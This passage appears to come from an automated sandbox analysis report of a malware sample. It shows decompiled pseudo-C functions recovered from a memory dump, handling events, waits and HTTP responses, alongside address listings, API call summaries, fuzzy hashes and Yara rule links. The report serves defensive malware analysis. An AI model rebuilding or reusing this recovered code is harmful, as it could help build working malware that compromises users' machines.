				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E04C050FF(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04C05745(_t101,  &_v236, _a8, _t96 - _t81);
					E04C05745(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E04C050FF(_t101, 0x4c0d1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E04C050FF(_a16, _a4);
						E04C05088(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L04C0AF2E();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L04C0AF28();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E04C05F21(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E04C090C2(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E04C06044(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x4c0d1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                          0x04c053c9
                                                          0x04c053d5
                                                          0x04c053db
                                                          0x04c053e0
                                                          0x04c053e4
                                                          0x04c05541
                                                          0x04c05545
                                                          0x04c05545
                                                          0x04c053ea
                                                          0x04c053ee
                                                          0x04c053f2
                                                          0x04c053f5
                                                          0x04c05400
                                                          0x04c05406
                                                          0x04c0540b
                                                          0x04c0540e
                                                          0x04c05428
                                                          0x04c05434
                                                          0x04c0543d
                                                          0x04c05447
                                                          0x04c0544c
                                                          0x04c0544e
                                                          0x04c05451
                                                          0x04c054ff
                                                          0x04c05505
                                                          0x04c05516
                                                          0x04c05529
                                                          0x04c05539
                                                          0x00000000
                                                          0x04c0553e
                                                          0x04c0545a
                                                          0x04c05461
                                                          0x04c05465
                                                          0x04c0546b
                                                          0x04c0546d
                                                          0x04c0546f
                                                          0x04c05471
                                                          0x04c05473
                                                          0x04c0547d
                                                          0x04c05482
                                                          0x04c05484
                                                          0x04c05486
                                                          0x04c05487
                                                          0x04c05488
                                                          0x04c05489
                                                          0x04c05490
                                                          0x04c05497
                                                          0x04c0549a
                                                          0x04c0549a
                                                          0x04c05467
                                                          0x04c05467
                                                          0x04c05467
                                                          0x04c054a2
                                                          0x04c054aa
                                                          0x04c054b3
                                                          0x04c054b8
                                                          0x04c054b8
                                                          0x04c054bd
                                                          0x00000000
                                                          0x00000000
                                                          0x04c054bf
                                                          0x04c054c2
                                                          0x04c054cc
                                                          0x00000000
                                                          0x00000000
                                                          0x04c054ce
                                                          0x04c054ce
                                                          0x04c054d8
                                                          0x04c054b8
                                                          0x04c054bd
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04c054bd
                                                          0x04c054e2
                                                          0x04c054e5
                                                          0x04c054e8
                                                          0x04c054ef
                                                          0x04c054ef
                                                          0x04c054fc
                                                          0x00000000
                                                          0x04c054fc
                                                          0x04c053f7
                                                          0x04c053fb
                                                          0x04c053fc
                                                          0x04c053fe
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04c053fe
                                                          0x00000000

                                                          APIs
                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04C05473
                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04C05489
                                                          • memset.NTDLL ref: 04C05529
                                                          • memset.NTDLL ref: 04C05539
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: memset$_allmul_aulldiv
                                                          • String ID:
                                                          • API String ID: 3041852380-0
                                                          • Opcode ID: 580e0ef4a0607603ef7af19c5052f40b3b95e9afb3cd6c6e98e8d7d0fa289742
                                                          • Instruction ID: 9e659b1772e92a5627bc021d3377131b28455e6f133eaa1b9765555959a2ee85
                                                          • Opcode Fuzzy Hash: 580e0ef4a0607603ef7af19c5052f40b3b95e9afb3cd6c6e98e8d7d0fa289742
                                                          • Instruction Fuzzy Hash: AE414071A00219BBEB10DFA8CC44BDE776AEF44714F10C529B91AA71C0DB71BA55DF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C0A81C, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000008,74B04D40), ref: 04C0A82E
                                                            • Part of subcall function 04C0A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04C05595), ref: 04C0A72B
                                                          • ResetEvent.KERNEL32(?), ref: 04C0A8A2
                                                          • GetLastError.KERNEL32 ref: 04C0A8C5
                                                          • GetLastError.KERNEL32 ref: 04C0A970
                                                            • Part of subcall function 04C0A734: HeapFree.KERNEL32(00000000,00000000,04C05637,00000000,?,?,00000000), ref: 04C0A740
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                          • String ID:
                                                          • API String ID: 943265810-0
                                                          • Opcode ID: 86dd1f73f2b34dcc75fb277d4cde05c1666357a1e16d2a4a07bcc69bd1864806
                                                          • Instruction ID: 18fd0f0edacc5080035fe00a66c842318b3d7824af352d7982bf7f91c04ecdbf
                                                          • Opcode Fuzzy Hash: 86dd1f73f2b34dcc75fb277d4cde05c1666357a1e16d2a4a07bcc69bd1864806
                                                          • Instruction Fuzzy Hash: 1E418275600704BFD7319FA5DC48E6F7BBEEB95704B118A29F543D1090E732AA85DB20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C015FF, Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 42%
                                                          			E04C015FF(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				void* _t30;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_push( &_v8);
					_push(4);
					_push( &_v20);
					_push( *((intOrPtr*)(_t69 + 0x18)));
					if( *0x4c0d134() != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x4c0d164(0, 1,  &_v12);
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E04C0A71F(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_push( &_v8);
										_push(0x1000);
										_push(_v16);
										_push( *((intOrPtr*)(_t69 + 0x18)));
										if( *0x4c0d134() != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E04C05646( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E04C0A734(_v16);
										if(_t64 == 0) {
											_t64 = E04C070CC(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E04C05646( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E04C09242(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}
















                                                          0x04c015ff
                                                          0x04c01600
                                                          0x04c01606
                                                          0x04c01611
                                                          0x04c01611
                                                          0x04c01613
                                                          0x04c018e7
                                                          0x04c018ec
                                                          0x04c018ee
                                                          0x04c018f3
                                                          0x04c018f4
                                                          0x04c018f9
                                                          0x04c018fa
                                                          0x04c01905
                                                          0x04c01936
                                                          0x04c0193b
                                                          0x04c019fe
                                                          0x04c01941
                                                          0x04c01948
                                                          0x04c01950
                                                          0x04c019fb
                                                          0x04c01956
                                                          0x04c0195b
                                                          0x04c01960
                                                          0x04c01965
                                                          0x04c019ed
                                                          0x04c0196b
                                                          0x04c0196b
                                                          0x04c0196d
                                                          0x04c01973
                                                          0x04c01974
                                                          0x04c01974
                                                          0x04c01977
                                                          0x04c0197a
                                                          0x04c01980
                                                          0x04c01985
                                                          0x04c01986
                                                          0x04c0198b
                                                          0x04c0198e
                                                          0x04c01999
                                                          0x00000000
                                                          0x00000000
                                                          0x04c019a1
                                                          0x04c019a9
                                                          0x04c019b5
                                                          0x04c019b9
                                                          0x04c019bb
                                                          0x04c019c0
                                                          0x00000000
                                                          0x00000000
                                                          0x04c019c0
                                                          0x04c019b9
                                                          0x04c019d2
                                                          0x04c019d5
                                                          0x04c019dc
                                                          0x04c019e7
                                                          0x04c019e7
                                                          0x00000000
                                                          0x04c019c2
                                                          0x04c019c2
                                                          0x04c019c7
                                                          0x04c019c9
                                                          0x04c019ca
                                                          0x04c019cd
                                                          0x00000000
                                                          0x04c019cd
                                                          0x00000000
                                                          0x04c019c7
                                                          0x04c01974
                                                          0x04c019ee
                                                          0x04c019ee
                                                          0x04c019f4
                                                          0x04c019f4
                                                          0x04c01950
                                                          0x04c01907
                                                          0x04c0190d
                                                          0x04c01915
                                                          0x04c0192e
                                                          0x04c01930
                                                          0x00000000
                                                          0x00000000
                                                          0x04c01917
                                                          0x04c01921
                                                          0x04c01925
                                                          0x04c0192b
                                                          0x00000000
                                                          0x04c0192b
                                                          0x04c01925
                                                          0x04c01915
                                                          0x04c01a07
                                                          0x04c01608
                                                          0x04c01608
                                                          0x04c0160f
                                                          0x04c0161a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04c0160f

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74B481D0), ref: 04C018EE
                                                          • GetLastError.KERNEL32(?,?,?,00000000,74B481D0), ref: 04C01907
                                                          • ResetEvent.KERNEL32(?), ref: 04C01980
                                                          • GetLastError.KERNEL32 ref: 04C0199B
                                                            • Part of subcall function 04C09242: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 04C09259
                                                            • Part of subcall function 04C09242: SetEvent.KERNEL32(?), ref: 04C09269
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$ObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 1123145548-0
                                                          • Opcode ID: 4c30a284a76414e07d391d7fe788443890f11e4c31282c1f24ab743bae1321c8
                                                          • Instruction ID: 33c38d1c9a576411eb9044b1876521d1555aea49080fcf77644cad2094eb96a1
                                                          • Opcode Fuzzy Hash: 4c30a284a76414e07d391d7fe788443890f11e4c31282c1f24ab743bae1321c8
                                                          • Instruction Fuzzy Hash: 0441C736600604ABDB219FA5CC44BAEB7BBEF44365F198528E551D71D0EE32FA419B10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C03AB0, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(80000002), ref: 04C03B0D
                                                          • SysAllocString.OLEAUT32(04C085ED), ref: 04C03B51
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04C03B65
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04C03B73
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: 511fe9e2c3008c094189d55455adf0874698df3bcbb26fdbfdd7f82a69d21683
                                                          • Instruction ID: ce0969a468024020a24454029e7cb820af1663685bf8fd354dd12246459f0bca
                                                          • Opcode Fuzzy Hash: 511fe9e2c3008c094189d55455adf0874698df3bcbb26fdbfdd7f82a69d21683
                                                          • Instruction Fuzzy Hash: 7F311E76900249EFCB04DF99D8C49AE7BB9FF48304B11842EF906D7261D734AA81CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C011EE, Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 87%
                                                          			E04C011EE(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x4c0d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x4c0d2a8; // 0x1c7a5a8
				_t3 = _t8 + 0x4c0e87e; // 0x61636f4c
				_t25 = 0;
				_t30 = E04C038A8(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x4c0d2ac, 1, 0, _t30);
					E04C0A734(_t30);
				}
				_t12 =  *0x4c0d25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04C0A65C() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E04C08EA1(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x4c0d10c( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E04C0A273(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                                          0x04c011ef
                                                          0x04c011f6
                                                          0x04c01200
                                                          0x04c01204
                                                          0x04c0120a
                                                          0x04c01219
                                                          0x04c01220
                                                          0x04c01224
                                                          0x04c01236
                                                          0x04c01238
                                                          0x04c01238
                                                          0x04c0123d
                                                          0x04c01244
                                                          0x04c0129b
                                                          0x04c0129b
                                                          0x04c012a1
                                                          0x04c012a3
                                                          0x04c012a3
                                                          0x04c012ad
                                                          0x04c012b1
                                                          0x04c012c3
                                                          0x04c012c3
                                                          0x04c012c7
                                                          0x04c012cd
                                                          0x04c012cd
                                                          0x00000000
                                                          0x04c0125d
                                                          0x04c01262
                                                          0x04c0126a
                                                          0x04c0126e
                                                          0x04c01272
                                                          0x04c01272
                                                          0x04c0127f
                                                          0x04c01283
                                                          0x04c01287
                                                          0x04c012dc
                                                          0x04c012e2
                                                          0x04c012e2
                                                          0x04c01295
                                                          0x04c01299
                                                          0x04c012d0
                                                          0x04c012d2
                                                          0x04c012d5
                                                          0x04c012d5
                                                          0x00000000
                                                          0x04c012d2
                                                          0x04c01299
                                                          0x00000000
                                                          0x04c01283

                                                          APIs
                                                            • Part of subcall function 04C038A8: lstrlen.KERNEL32(00000005,00000000,63699BC3,00000027,00000000,06889A98,00000000,?,?,63699BC3,00000005,04C0D00C,?,?,04C05D30), ref: 04C038DE
                                                            • Part of subcall function 04C038A8: lstrcpy.KERNEL32(00000000,00000000), ref: 04C03902
                                                            • Part of subcall function 04C038A8: lstrcat.KERNEL32(00000000,00000000), ref: 04C0390A
                                                          • CreateEventA.KERNEL32(04C0D2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04C03760,?,00000001,?), ref: 04C0122F
                                                            • Part of subcall function 04C0A734: HeapFree.KERNEL32(00000000,00000000,04C05637,00000000,?,?,00000000), ref: 04C0A740
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,04C03760,00000000,00000000,?,00000000,?,04C03760,?,00000001,?,?,?,?,04C052AA), ref: 04C0128F
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,04C03760,?,00000001,?), ref: 04C012BD
                                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04C03760,?,00000001,?,?,?,?,04C052AA), ref: 04C012D5
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 73268831-0
                                                          • Opcode ID: 65d1513e8cb3f901dcba7329dd4452689d6d96d182400ede4f083a6d62aba6e9
                                                          • Instruction ID: 639198a00d8ba82f8fa5faf55286eb56a01eb4e79c4178dcfa3786579125660d
                                                          • Opcode Fuzzy Hash: 65d1513e8cb3f901dcba7329dd4452689d6d96d182400ede4f083a6d62aba6e9
                                                          • Instruction Fuzzy Hash: 9A21E4326103105BDB315AAD9C44B7BB3ABFB89714F0A8625F906D71C0DF66EE408694
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C09242, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 38%
                                                          			E04C09242(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x4c0d13c; // 0x4c0abf1
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E04C0A71F(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E04C0A734(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E04C05646( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}















                                                          0x04c09242
                                                          0x04c09242
                                                          0x04c0924c
                                                          0x04c09252
                                                          0x04c09255
                                                          0x04c09259
                                                          0x04c0925f
                                                          0x04c09264
                                                          0x04c0927d
                                                          0x04c09280
                                                          0x04c09284
                                                          0x04c09288
                                                          0x04c09289
                                                          0x04c0928e
                                                          0x04c09291
                                                          0x04c09298
                                                          0x04c0929f
                                                          0x04c092f2
                                                          0x04c092f8
                                                          0x04c092fe
                                                          0x04c09339
                                                          0x04c0933f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04c092fe
                                                          0x04c092a5
                                                          0x00000000
                                                          0x04c092ac
                                                          0x04c092ba
                                                          0x04c092bd
                                                          0x04c092c0
                                                          0x04c092cc
                                                          0x04c092d0
                                                          0x04c09332
                                                          0x04c092d2
                                                          0x04c092d5
                                                          0x04c092d9
                                                          0x04c092da
                                                          0x04c092db
                                                          0x04c092dd
                                                          0x04c092e4
                                                          0x04c09322
                                                          0x04c0932d
                                                          0x04c092e6
                                                          0x04c092e9
                                                          0x04c092ed
                                                          0x04c092ed
                                                          0x04c092e4
                                                          0x00000000
                                                          0x04c092d0
                                                          0x04c092a5
                                                          0x04c09269
                                                          0x04c0926f
                                                          0x04c09272
                                                          0x04c09277
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04c09307
                                                          0x04c0930f
                                                          0x04c09314
                                                          0x04c09317
                                                          0x00000000

                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 04C09259
                                                          • SetEvent.KERNEL32(?), ref: 04C09269
                                                          • GetLastError.KERNEL32 ref: 04C092F2
                                                            • Part of subcall function 04C05646: WaitForMultipleObjects.KERNEL32(00000002,04C0A8E3,00000000,04C0A8E3,?,?,?,04C0A8E3,0000EA60), ref: 04C05661
                                                            • Part of subcall function 04C0A734: HeapFree.KERNEL32(00000000,00000000,04C05637,00000000,?,?,00000000), ref: 04C0A740
                                                          • GetLastError.KERNEL32(00000000), ref: 04C09327
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                          • String ID:
                                                          • API String ID: 602384898-0
                                                          • Opcode ID: bcc43efcb3b653d774ad02d4ba3162c79a90e4148cad25aeea59fea912e9a754
                                                          • Instruction ID: a39d12b1ce59ebf65c87ba97874735ddd9d7e75852cb3be2e8d61094ca8619f4
                                                          • Opcode Fuzzy Hash: bcc43efcb3b653d774ad02d4ba3162c79a90e4148cad25aeea59fea912e9a754
                                                          • Instruction Fuzzy Hash: 55310EB5900309EFDB20DFA5C884AAEB7B9EB08304F10C96AE542E2191D775AB44DF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C036B1, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 40%
                                                          			E04C036B1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E04C03BB9(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E04C04F79(_t23);
						}
					}
					return _t38;
				}
				if(E04C0A2F9(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x4c0d2ac, 1, 0,  *0x4c0d344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E04C0A446(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E04C0853F(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E04C04F14(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E04C011EE( &_v32, _t39);
					goto L13;
				}
			}












                                                          0x04c036b1
                                                          0x04c036be
                                                          0x04c036c4
                                                          0x04c036c5
                                                          0x04c036c6
                                                          0x04c036c7
                                                          0x04c036c8
                                                          0x04c036cc
                                                          0x04c036d8
                                                          0x04c036dc
                                                          0x04c03764
                                                          0x04c03764
                                                          0x04c03767
                                                          0x04c03769
                                                          0x04c03771
                                                          0x04c03771
                                                          0x04c03777
                                                          0x04c0377a
                                                          0x04c0377a
                                                          0x04c03777
                                                          0x04c03785
                                                          0x04c03785
                                                          0x04c036ef
                                                          0x04c036f1
                                                          0x04c036f1
                                                          0x04c03708
                                                          0x04c0370c
                                                          0x04c0370f
                                                          0x04c0371a
                                                          0x04c03721
                                                          0x04c03721
                                                          0x04c0372a
                                                          0x04c0372e
                                                          0x04c0373c
                                                          0x04c03730
                                                          0x04c03730
                                                          0x04c03731
                                                          0x04c03732
                                                          0x04c03733
                                                          0x04c03734
                                                          0x04c03735
                                                          0x04c03735
                                                          0x04c03741
                                                          0x04c03744
                                                          0x04c03748
                                                          0x04c0374a
                                                          0x04c0374a
                                                          0x04c03751
                                                          0x00000000
                                                          0x04c03753
                                                          0x04c03753
                                                          0x04c03760
                                                          0x00000000
                                                          0x04c03760

                                                          APIs
                                                          • CreateEventA.KERNEL32(04C0D2AC,00000001,00000000,00000040,00000001,?,74B5F710,00000000,74B5F730,?,?,?,04C052AA,?,00000001,?), ref: 04C03702
